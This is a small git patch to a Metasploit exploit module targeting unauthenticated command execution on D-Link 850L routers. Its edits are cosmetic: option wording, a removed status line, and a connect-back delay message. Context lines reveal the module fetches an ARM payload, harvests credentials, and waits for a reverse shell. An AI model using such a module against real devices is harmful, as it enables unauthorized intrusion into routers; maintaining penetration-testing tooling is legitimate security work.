From e783cb59ead15781f79364bfad7f8380fc8fa4cf Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 08:53:50 -0400 Subject: [PATCH] add "check" & msftidy --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd6cc8f7ad..cd8fe1b141 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -51,10 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), - OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to listener', 10]) ]) end - + def check begin res = send_request_cgi({ @@ -218,13 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end - # # Information Retrieval, obtains creds and logs in # @@ -336,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote # Waits for shell to connect back to us, otherwise server stops and nothing is returned # def wait_for_connect - print_status("#{peer} - Waiting for shell to connect back to us...") + print_status("#{peer} - Waiting #{datastore['CONNECTBACK_DELAY'].to_s} seconds for shell to connect back to us...") waited = 0 while (@elf_sent) select(nil, nil, nil, 1)